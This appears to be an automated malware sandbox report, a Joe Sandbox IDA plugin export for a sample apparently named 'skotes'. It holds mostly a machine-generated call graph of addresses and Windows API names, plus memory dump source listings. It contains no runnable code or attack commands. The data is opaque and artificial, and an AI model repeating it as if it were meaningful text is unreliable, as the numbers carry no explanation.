9833 aff10a 9832->9833 9834 aff0a3 __cftof RtlAllocateHeap 9833->9834 9835 aff115 9834->9835 9836 aff0a3 __cftof RtlAllocateHeap 9835->9836 9837 aff123 9836->9837 9838 afadf5 __freea RtlAllocateHeap 9837->9838 9839 aff12e 9838->9839 9840 afadf5 __freea RtlAllocateHeap 9839->9840 9841 aff139 9840->9841 9842 afadf5 __freea RtlAllocateHeap 9841->9842 9843 aff144 9842->9843 9844 aff0a3 __cftof RtlAllocateHeap 9843->9844 9845 aff152 9844->9845 9846 aff0a3 __cftof RtlAllocateHeap 9845->9846 9847 aff160 9846->9847 9848 aff0a3 __cftof RtlAllocateHeap 9847->9848 9849 aff171 9848->9849 9850 aff0a3 __cftof RtlAllocateHeap 9849->9850 9851 aff17f 9850->9851 9852 aff0a3 __cftof RtlAllocateHeap 9851->9852 9853 aff18d 9852->9853 9854 afadf5 __freea RtlAllocateHeap 9853->9854 9855 aff198 9854->9855 9856 afadf5 __freea RtlAllocateHeap 9855->9856 9857 aff1a3 9856->9857 9858 afadf5 __freea RtlAllocateHeap 9857->9858 9859 aff1ae 9858->9859 9860 afadf5 __freea RtlAllocateHeap 9859->9860 9860->9826 9862 aff0d6 9861->9862 9863 aff0c6 9861->9863 9862->9830 9863->9862 9864 afadf5 __freea RtlAllocateHeap 9863->9864 9864->9863 9867 ac2480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9865->9867 9866 add401 Concurrency::cancel_current_task 9866->9709 9867->9866 9877 af38af 9867->9877 9898 adc1b9 9870->9898 9874 ac248e Concurrency::cancel_current_task 9873->9874 9875 af38af ___std_exception_copy RtlAllocateHeap 9874->9875 9876 ac24c3 9875->9876 9878 ac24c3 9877->9878 9880 af38bc ___std_exception_copy 9877->9880 9878->9709 9879 af38e9 9892 af8ba3 9879->9892 9880->9878 9880->9879 9883 afa1f1 9880->9883 9884 afa20c 9883->9884 9885 afa1fe 9883->9885 9886 af75f6 __dosmaperr RtlAllocateHeap 9884->9886 9885->9884 9890 afa223 9885->9890 9887 afa214 9886->9887 9895 af6c5a 9887->9895 9889 afa21e 9889->9879 9890->9889 9891 af75f6 __dosmaperr RtlAllocateHeap 9890->9891 9891->9887 9893 afadf5 __freea RtlAllocateHeap 9892->9893 9894 af8bbb 9893->9894 9894->9878 9896 af6bf6 __cftof RtlAllocateHeap 9895->9896 9897 af6c66 9896->9897 9897->9889 9901 adc123 9898->9901 9900 adc1ca Concurrency::cancel_current_task 9904 ac22e0 9901->9904 9903 adc135 9903->9900 9905 af38af ___std_exception_copy RtlAllocateHeap 9904->9905 9906 ac2317 __floor_pentium4 9905->9906 9906->9903 11728 adbe50 11731 adbd8b 11728->11731 11730 adbe66 Concurrency::cancel_current_task std::_Throw_future_error 11732 ac22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11731->11732 11733 adbd9f 11732->11733 11733->11730 11743 ac9ba5 11744 ac9ba7 11743->11744 11745 ad7a00 RtlAllocateHeap 11744->11745 11746 ac9ca9 11745->11746 11747 ac5c10 4 API calls 11746->11747 11748 ac9cb1 11747->11748 11749 ac8b30 4 API calls 11748->11749 11750 ac9cc2 11749->11750 11751 ad8220 RtlAllocateHeap 11750->11751 11752 ac9cd1 11751->11752 11793 af8bbe 11794 af8868 4 API calls 11793->11794 11795 af8bdc 11794->11795 11796 af67b7 11797 af67c3 __dosmaperr 11796->11797 11798 af67cd 11797->11798 11799 af67e2 11797->11799 11800 af75f6 __dosmaperr RtlAllocateHeap 11798->11800 11801 af67dd 11799->11801 11805 af6740 11799->11805 11802 af67d2 11800->11802 11803 af6c5a __cftof RtlAllocateHeap 11802->11803 11803->11801 11806 af674d 11805->11806 11807 af6762 11805->11807 11808 af75f6 __dosmaperr RtlAllocateHeap 11806->11808 11813 af675d 11807->11813 11821 afa038 11807->11821 11809 af6752 11808->11809 11811 af6c5a __cftof RtlAllocateHeap 11809->11811 11811->11813 11813->11801 11817 af6785 11838 afaebb 11817->11838 11820 afadf5 __freea RtlAllocateHeap 11820->11813 11822 af6777 11821->11822 11823 afa050 11821->11823 11827 afb00b 11822->11827 11823->11822 11824 afafe4 RtlAllocateHeap 11823->11824 11825 afa06e 11824->11825 11853 b00439 11825->11853 11828 afb022 11827->11828 11830 af677f 11827->11830 11829 afadf5 __freea RtlAllocateHeap 11828->11829 11828->11830 11829->11830 11831 afafe4 11830->11831 11832 afb005 11831->11832 11833 afaff0 11831->11833 11832->11817 11834 af75f6 __dosmaperr RtlAllocateHeap 11833->11834 11835 afaff5 11834->11835 11836 af6c5a __cftof RtlAllocateHeap 11835->11836 11837 afb000 11836->11837 11837->11817 11839 afaecc 11838->11839 11840 afaee1 11838->11840 11842 af75e3 __dosmaperr RtlAllocateHeap 11839->11842 11841 afaf2a 11840->11841 11846 afaf08 11840->11846 11843 af75e3 __dosmaperr RtlAllocateHeap 11841->11843 11844 afaed1 11842->11844 11847 afaf2f 11843->11847 11845 af75f6 __dosmaperr RtlAllocateHeap 11844->11845 11850 af678b 11845->11850 11871 afae2f 11846->11871 11849 af75f6 __dosmaperr RtlAllocateHeap 11847->11849 11851 afaf37 11849->11851 11850->11813 11850->11820 11852 af6c5a __cftof RtlAllocateHeap 11851->11852 11852->11850 11854 b00445 __dosmaperr 11853->11854 11855 b00465 11854->11855 11856 b0044d 11854->11856 11858 b00500 11855->11858 11866 b00497 11855->11866 11857 af75e3 __dosmaperr RtlAllocateHeap 11856->11857 11859 b00452 11857->11859 11860 af75e3 __dosmaperr RtlAllocateHeap 11858->11860 11861 af75f6 __dosmaperr RtlAllocateHeap 11859->11861 11862 b00505 11860->11862 11870 b0045a 11861->11870 11863 af75f6 __dosmaperr RtlAllocateHeap 11862->11863 11864 b0050d 11863->11864 11865 af6c5a __cftof RtlAllocateHeap 11864->11865 11865->11870 11867 af75f6 __dosmaperr RtlAllocateHeap 11866->11867 11866->11870 11868 b004be 11867->11868 11869 af75e3 __dosmaperr RtlAllocateHeap 11868->11869 11869->11870 11870->11822 11872 afae3b __dosmaperr 11871->11872 11873 afae7b 11872->11873 11874 afae70 11872->11874 11876 af75f6 __dosmaperr RtlAllocateHeap 11873->11876 11878 afaf48 11874->11878 11877 afae76 11876->11877 11877->11850 11889 afc0de 11878->11889 11880 afaf58 11881 afaf90 11880->11881 11882 afc0de RtlAllocateHeap 11880->11882 11885 afaf5e 11880->11885 11883 afc0de RtlAllocateHeap 11881->11883 11881->11885 11886 afaf87 11882->11886 11883->11885 11884 afafd8 11884->11877 11885->11884 11887 af75c0 __dosmaperr RtlAllocateHeap 11885->11887 11888 afc0de RtlAllocateHeap 11886->11888 11887->11884 11888->11881 11890 afc0eb 11889->11890 11894 afc100 11889->11894 11891 af75e3 __dosmaperr RtlAllocateHeap 11890->11891 11893 afc0f0 11891->11893 11892 af75e3 __dosmaperr RtlAllocateHeap 11895 afc130 11892->11895 11896 af75f6 __dosmaperr RtlAllocateHeap 11893->11896 11894->11892 11897 afc125 11894->11897 11898 af75f6 __dosmaperr RtlAllocateHeap 11895->11898 11899 afc0f8 11896->11899 11897->11880 11900 afc138 11898->11900 11899->11880 11901 af6c5a __cftof RtlAllocateHeap 11900->11901 11901->11899 11902 ac6db5 11903 ac6dc2 11902->11903 11904 ac6dca 11903->11904 11905 ac6df5 11903->11905 11906 ad80c0 RtlAllocateHeap 11904->11906 11907 ad80c0 RtlAllocateHeap 11905->11907 11908 ac6deb shared_ptr 11906->11908 11907->11908 11909 ac6ec1 shared_ptr 11908->11909 11910 af6c6a RtlAllocateHeap 11908->11910 11911 ac6ee3 11910->11911 11916 acb7b1 11917 acb7be 11916->11917 11918 ad7a00 RtlAllocateHeap 11917->11918 11919 acb7f3 11918->11919 11920 ad7a00 RtlAllocateHeap 11919->11920 11921 acb80b 11920->11921 11922 ad7a00 RtlAllocateHeap 11921->11922 11923 acb823 11922->11923 11924 ad7a00 RtlAllocateHeap 11923->11924 11925 acb835 11924->11925 11969 ac8980 11970 ac8aea 11969->11970 11977 ac89d8 shared_ptr 11969->11977 11971 ad7a00 RtlAllocateHeap 11971->11977 11972 ac5c10 4 API calls 11972->11977 11973 ac8b20 11975 ad8200 RtlAllocateHeap 11973->11975 11974 ad80c0 RtlAllocateHeap 11974->11977 11976 ac8b25 11975->11976 11978 af6c6a RtlAllocateHeap 11976->11978 11977->11970 11977->11971 11977->11972 11977->11973 11977->11974 11977->11976 11979 ac8b2a 11978->11979 11980 ac3f9f 11981 ac3fad 11980->11981 11985 ac3fc5 11980->11985 11982 ac2410 5 API calls 11981->11982 11983 ac3fb6 11982->11983 11984 ac3ce0 RtlAllocateHeap 11983->11984 11984->11985 11989 ac2b90 11990 ac2bce 11989->11990 11993 adb7fb 11990->11993 11992 ac2bdb shared_ptr __floor_pentium4 11994 adb807 11993->11994 11996 adb817 11993->11996 11994->11996 11997 adca78 11994->11997 11996->11992 11998 adca8d TpReleaseWork 11997->11998 11998->11996 12039 ac3fe0 12040 ac4022 12039->12040 12041 ac408c 12040->12041 12042 ac40d2 12040->12042 12045 ac4035 __floor_pentium4 12040->12045 12046 ac35e0 12041->12046 12057 ac3ee0 12042->12057 12047 add3e2 RtlAllocateHeap 12046->12047 12048 ac3616 12047->12048 12049 ac364e 12048->12049 12050 ac3691 12048->12050 12053 adc17c Concurrency::cancel_current_task RtlAllocateHeap 12049->12053 12056 ac3663 shared_ptr __floor_pentium4 12049->12056 12063 ac2ce0 12050->12063 12052 ac369e 12052->12056 12072 ac2c00 12052->12072 12054 ac3720 12053->12054 12054->12045 12056->12045 12058 ac3f1e 12057->12058 12059 ac3f48 12057->12059 12058->12045 12060 ac3f58 12059->12060 12061 ac2c00 4 API calls 12059->12061 12060->12045 12062 ac3f7f 12061->12062 12062->12045 12064 ac2d1d 12063->12064 12065 adbedf InitOnceExecuteOnce 12064->12065 12066 ac2d46 12065->12066 12067 ac2d51 __floor_pentium4 12066->12067 12069 ac2d88 12066->12069 12082 adbef7 12066->12082 12067->12052 12070 ac2440 4 API calls 12069->12070 12071 ac2d9b 12070->12071 12071->12052 12073 add3e2 RtlAllocateHeap 12072->12073 12074 ac2c0e 12073->12074 12107 adb847 12074->12107 12076 ac2c42 12077 ac2c49 12076->12077 12113 ac2c80 12076->12113 12077->12056 12079 ac2c58 12116 ac2560 12079->12116 12081 ac2c65 Concurrency::cancel_current_task 12083 adbf03 12082->12083 12091 ac2900 12083->12091 12085 adbf23 Concurrency::cancel_current_task 12086 adbf6a 12085->12086 12087 adbf73 12085->12087 12101 adbe7f 12086->12101 12089 ac2ae0 5 API calls 12087->12089 12090 adbf6f 12089->12090 12090->12069 12092 ad80c0 RtlAllocateHeap 12091->12092 12093 ac294f 12092->12093 12094 ac26b0 RtlAllocateHeap 12093->12094 12096 ac2967 12094->12096 12095 ac298d shared_ptr 12095->12085 12096->12095 12097 af6c6a RtlAllocateHeap 12096->12097 12098 ac29b6 12097->12098 12099 af38af ___std_exception_copy RtlAllocateHeap 12098->12099 12100 ac29e4 12099->12100 12100->12085 12102 adcc31 InitOnceExecuteOnce 12101->12102 12103 adbe97 12102->12103 12104 adbe9e 12103->12104 12105 af6cbb 4 API calls 12103->12105 12104->12090 12106 adbea7 12105->12106 12106->12090 12108 adb854 12107->12108 12112 adb873 Concurrency::details::_Reschedule_chore 12107->12112 12119 adcb77 12108->12119 12110 adb864 12110->12112 12121 adb81e 12110->12121 12112->12076 12114 adb7fb TpReleaseWork 12113->12114 12115 ac2cb2 shared_ptr 12114->12115 12115->12079 12117 af38af ___std_exception_copy RtlAllocateHeap 12116->12117 12118 ac2597 __floor_pentium4 12117->12118 12118->12081 12120 adcb92 CreateThreadpoolWork 12119->12120 12120->12110 12122 adb827 Concurrency::details::_Reschedule_chore 12121->12122 12125 adcdcc 12122->12125 12124 adb841 12124->12112 12126 adcde1 TpPostWork 12125->12126 12126->12124 12127 ad85e0 12128 ad85f6 12127->12128 12128->12128 12129 ad860b 12128->12129 12130 ad8f40 RtlAllocateHeap 12128->12130 12130->12129 12131 ad8de0 12132 ad8f2f 12131->12132 12133 ad8e05 12131->12133 12134 ad9270 RtlAllocateHeap 12132->12134 12137 ad8e4c 12133->12137 12138 ad8e76 12133->12138 12135 ad8f34 12134->12135 12136 ac2480 RtlAllocateHeap 12135->12136 12144 ad8e5d __cftof 12136->12144 12137->12135 12139 ad8e57 12137->12139 12140 add3e2 RtlAllocateHeap 12138->12140 12138->12144 12142 add3e2 RtlAllocateHeap 12139->12142 12140->12144 12141 af6c6a RtlAllocateHeap 12143 ad8f3e 12141->12143 12142->12144 12144->12141 12145 ad8eed shared_ptr __cftof 12144->12145 12146 ac55f0 12147 ac5610 12146->12147 12148 ac22c0 4 API calls 12147->12148 12149 ac5710 __floor_pentium4 12147->12149 12148->12147 12150 ac43f0 12151 adbedf InitOnceExecuteOnce 12150->12151 12152 ac440a 12151->12152 12153 ac4411 12152->12153 12154 af6cbb 4 API calls 12152->12154 12155 ac4424 12154->12155 12191 ac21c0 12192 ac21cb 12191->12192 12193 ac21d0 12191->12193 12194 ac21d4 12193->12194 12199 ac21ec __cftof 12193->12199 12195 af75f6 __dosmaperr RtlAllocateHeap 12194->12195 12197 ac21d9 12195->12197 12196 ac21fc __cftof 12198 af6c5a __cftof RtlAllocateHeap 12197->12198 12200 ac21e4 12198->12200 12199->12196 12201 ac2221 12199->12201 12203 ac223a 12199->12203 12204 af75f6 __dosmaperr RtlAllocateHeap 12201->12204 12202 ac2231 12203->12202 12205 af75f6 __dosmaperr RtlAllocateHeap 12203->12205 12206 ac2226 12204->12206 12207 ac2247 12205->12207 12208 af6c5a __cftof RtlAllocateHeap 12206->12208 12209 af6c5a __cftof RtlAllocateHeap 12207->12209 12208->12202 12210 ac2252 12209->12210 12219 ad79c0 12220 ad79e0 12219->12220 12220->12220 12221 ad80c0 RtlAllocateHeap 12220->12221 12222 ad79f2 12221->12222 12223 ad83c0 12224 ad7760 RtlAllocateHeap 12223->12224 12225 ad8439 12224->12225 12226 ad8f40 RtlAllocateHeap 12225->12226 12227 ad8454 12225->12227 12226->12227 12228 ad8f40 RtlAllocateHeap 12227->12228 12230 ad84a8 12227->12230 12229 ad84ee 12228->12229 12235 ac87d0 12236 ac88d3 12235->12236 12244 ac8819 shared_ptr 12235->12244 12237 ad80c0 RtlAllocateHeap 12236->12237 12243 ac8923 12237->12243 12238 ac896c 12241 ad8200 RtlAllocateHeap 12238->12241 12239 ac8949 shared_ptr 12240 ad80c0 RtlAllocateHeap 12240->12244 12242 ac8971 12241->12242 12243->12239 12245 af6c6a RtlAllocateHeap 12243->12245 12244->12236 12244->12238 12244->12240 12244->12243 12245->12238 12246 af6729 12249 af6672 12246->12249 12248 af673b 12252 af667e __dosmaperr 12249->12252 12250 af6685 12251 af75f6 __dosmaperr RtlAllocateHeap 12250->12251 12253 af668a 12251->12253 12252->12250 12254 af66a5 12252->12254 12255 af6c5a __cftof RtlAllocateHeap 12253->12255 12256 af66aa 12254->12256 12257 af66b7 12254->12257 12262 af6695 12255->12262 12258 af75f6 __dosmaperr RtlAllocateHeap 12256->12258 12263 afa8c3 12257->12263 12258->12262 12260 af66c0 12261 af75f6 __dosmaperr RtlAllocateHeap 12260->12261 12260->12262 12261->12262 12262->12248 12264 afa8cf __dosmaperr 12263->12264 12267 afa967 12264->12267 12266 afa8ea 12266->12260 12268 afa98a 12267->12268 12269 afd82f __dosmaperr RtlAllocateHeap 12268->12269 12272 afa9d0 12268->12272 12270 afa9eb 12269->12270 12271 afadf5 __freea RtlAllocateHeap 12270->12271 12271->12272 12272->12266 12278 ac4120 12279 ac416a 12278->12279 12280 ac41a6 12279->12280 12283 ac41f6 12279->12283 12281 ac3ee0 4 API calls 12280->12281 12284 ac41b2 __floor_pentium4 12281->12284 12285 adb6be 12283->12285 12286 adb6ca 12285->12286 12289 ad75a0 12286->12289 12290 ad75ab Concurrency::cancel_current_task 12289->12290 12291 adc0e9 std::invalid_argument::invalid_argument RtlAllocateHeap 12290->12291 12292 adc1aa Concurrency::cancel_current_task 12291->12292 12328 ad8320 12329 ad8339 12328->12329 12330 ad834d 12329->12330 12331 ad8f40 RtlAllocateHeap 12329->12331 12331->12330 12337 ac6535 12339 ac6549 shared_ptr 12337->12339 12338 af6c6a RtlAllocateHeap 12341 ac65dc 12338->12341 12339->12338 12340 ac65b1 shared_ptr __floor_pentium4 12339->12340 12342 ad7a00 RtlAllocateHeap 12341->12342 12343 ac66a6 12342->12343 12344 ac5c10 4 API calls 12343->12344 12345 ac66ac 12344->12345 12346 ac5c10 4 API calls 12345->12346 12347 ac66b1 12346->12347 12348 ac22c0 4 API calls 12347->12348 12349 ac66c9 shared_ptr 12348->12349 12350 ad7a00 RtlAllocateHeap 12349->12350 12351 ac6732 12350->12351 12352 ac5c10 4 API calls 12351->12352 12353 ac673d 12352->12353 12354 ac22c0 4 API calls 12353->12354 12355 ac6757 shared_ptr 12354->12355 12356 ac6852 12355->12356 12358 ad7a00 RtlAllocateHeap 12355->12358 12361 ac5c10 4 API calls 12355->12361 12362 ac22c0 4 API calls 12355->12362 12356->12356 12357 ad80c0 RtlAllocateHeap 12356->12357 12359 ac689c 12357->12359 12358->12355 12360 ad80c0 RtlAllocateHeap 12359->12360 12363 ac68e3 shared_ptr __floor_pentium4 12360->12363 12361->12355 12362->12355 12385 ac4300 12386 ac432e 12385->12386 12389 ac4359 shared_ptr 12385->12389 12387 af6c6a RtlAllocateHeap 12386->12387 12386->12389 12388 ac43eb 12387->12388 12415 ac211c 12416 ac2126 12415->12416 12417 add64e RtlAllocateHeap 12416->12417 12418 ac2132 12417->12418 12419 add111 12421 add121 12419->12421 12420 add12a 12421->12420 12423 add199 12421->12423 12424 add1a7 SleepConditionVariableCS 12423->12424 12426 add1c0 12423->12426 12424->12426 12426->12421 12430 ac2b10 12431 ac2b1c 12430->12431 12432 ac2b1a 12430->12432 12433 adc26a 5 API calls 12431->12433 12434 ac2b22 12433->12434 12435 ad8510 12436 ad855f 12435->12436 12439 ad856c 12435->12439 12441 ad9d00 12436->12441 12438 ad85c4 12439->12438 12462 ada060 12439->12462 12442 ad9e31 12441->12442 12446 ad9d25 12441->12446 12443 ad9270 RtlAllocateHeap 12442->12443 12456 ad9d8b __cftof 12443->12456 12444 af6c6a RtlAllocateHeap 12454 ad9e3b 12444->12454 12445 ad9e2c 12447 ac2480 RtlAllocateHeap 12445->12447 12446->12445 12448 ad9d7a 12446->12448 12449 ad9da1 12446->12449 12447->12442 12448->12445 12450 ad9d85 12448->12450 12451 add3e2 RtlAllocateHeap 12449->12451 12449->12456 12452 add3e2 RtlAllocateHeap 12450->12452 12451->12456 12452->12456 12453 ad9e6a shared_ptr 12453->12439 12454->12453 12455 af6c6a RtlAllocateHeap 12454->12455 12458 ad9e8e 12455->12458 12456->12444 12457 ad9dfc shared_ptr __cftof 12456->12457 12457->12439 12459 ad9ec0 shared_ptr 12458->12459 12460 af6c6a RtlAllocateHeap 12458->12460 12459->12439 12461 ad9ee6 12460->12461 12463 ada1b1 12462->12463 12467 ada083 12462->12467 12464 ad9270 RtlAllocateHeap 12463->12464 12475 ada0e4 __cftof 12464->12475 12465 af6c6a RtlAllocateHeap 12474 ada1bb shared_ptr 12465->12474 12466 ada1ac 12468 ac2480 RtlAllocateHeap 12466->12468 12467->12466 12469 ada0fd 12467->12469 12470 ada0d3 12467->12470 12468->12463 12472 add3e2 RtlAllocateHeap 12469->12472 12469->12475 12470->12466 12471 ada0de 12470->12471 12473 add3e2 RtlAllocateHeap 12471->12473 12472->12475 12473->12475 12474->12439 12475->12465 12476 ada16c shared_ptr __cftof 12475->12476 12476->12439 12520 ac5f76 12522 ac5f81 shared_ptr 12520->12522 12521 ac5ffe shared_ptr __floor_pentium4 12522->12521 12523 af6c6a RtlAllocateHeap 12522->12523 12524 ac601b 12523->12524 12525 ad80c0 RtlAllocateHeap 12524->12525 12526 ac6089 12525->12526 12527 ad80c0 RtlAllocateHeap 12526->12527 12528 ac60bd 12527->12528 12529 ad80c0 RtlAllocateHeap 12528->12529 12530 ac60ee 12529->12530 12531 ad80c0 RtlAllocateHeap 12530->12531 12532 ac611f 12531->12532 12533 ad80c0 RtlAllocateHeap 12532->12533 12535 ac6150 12533->12535 12534 ac65b1 shared_ptr __floor_pentium4 12535->12534 12536 af6c6a RtlAllocateHeap 12535->12536 12537 ac65dc 12536->12537 12538 ad7a00 RtlAllocateHeap 12537->12538 12539 ac66a6 12538->12539 12540 ac5c10 4 API calls 12539->12540 12541 ac66ac 12540->12541 12542 ac5c10 4 API calls 12541->12542 12543 ac66b1 12542->12543 12544 ac22c0 4 API calls 12543->12544 12545 ac66c9 shared_ptr 12544->12545 12546 ad7a00 RtlAllocateHeap 12545->12546 12547 ac6732 12546->12547 12548 ac5c10 4 API calls 12547->12548 12549 ac673d 12548->12549 12550 ac22c0 4 API calls 12549->12550 12559 ac6757 shared_ptr 12550->12559 12551 ac6852 12552 ad80c0 RtlAllocateHeap 12551->12552 12554 ac689c 12552->12554 12553 ad7a00 RtlAllocateHeap 12553->12559 12555 ad80c0 RtlAllocateHeap 12554->12555 12558 ac68e3 shared_ptr __floor_pentium4 12555->12558 12556 ac5c10 4 API calls 12556->12559 12557 ac22c0 4 API calls 12557->12559 12559->12551 12559->12553 12559->12556 12559->12557 12560 ac3970 12561 adc68b __Mtx_init_in_situ 2 API calls 12560->12561 12562 ac39a7 12561->12562 12563 adc68b __Mtx_init_in_situ 2 API calls 12562->12563 12564 ac39e6 12563->12564 12565 ac2170 12570 adc6fc 12565->12570 12568 add64e RtlAllocateHeap 12569 ac2184 12568->12569 12571 adc70c 12570->12571 12573 ac217a 12570->12573 12571->12573 12574 adcfbe 12571->12574 12573->12568 12575 adccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12574->12575 12576 adcfd0 12575->12576 12576->12571 12577 ac3770 12578 ac379b 12577->12578 12579 ac37cd shared_ptr 12578->12579 12580 af6c6a RtlAllocateHeap 12578->12580 12581 ac380f 12580->12581 12582 aca54d 12584 aca555 shared_ptr 12582->12584 12583 aca944 12586 af6c6a RtlAllocateHeap 12583->12586 12584->12583 12585 aca628 shared_ptr 12584->12585 12589 ad80c0 RtlAllocateHeap 12585->12589 12587 aca949 12586->12587 12588 af6c6a RtlAllocateHeap 12587->12588 12591 aca94e 12588->12591 12590 aca903 12589->12590 12592 af6c6a RtlAllocateHeap 12591->12592 12593 aca953 Sleep CreateMutexA 12592->12593 12594 aca98e 12593->12594 12607 ac9f44 12608 ac9f4c shared_ptr 12607->12608 12609 aca01f shared_ptr 12608->12609 12610 aca92b 12608->12610 12614 ad80c0 RtlAllocateHeap 12609->12614 12611 aca953 Sleep CreateMutexA 12610->12611 12612 af6c6a RtlAllocateHeap 12610->12612 12613 aca98e 12611->12613 12612->12611 12615 aca903 12614->12615 12656 ac215a 12657 adc6fc InitializeCriticalSectionEx 12656->12657 12658 ac2164 12657->12658 12659 add64e RtlAllocateHeap 12658->12659 12660 ac216e 12659->12660

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 358 af652b-af6538 call afa302 361 af655a-af656c call af656d ExitProcess 358->361 362 af653a-af6548 GetPEB 358->362 362->361 363 af654a-af6559 362->363 363->361
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,00AF652A,?,?,?,?,?,00AF7661), ref: 00AF6567
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
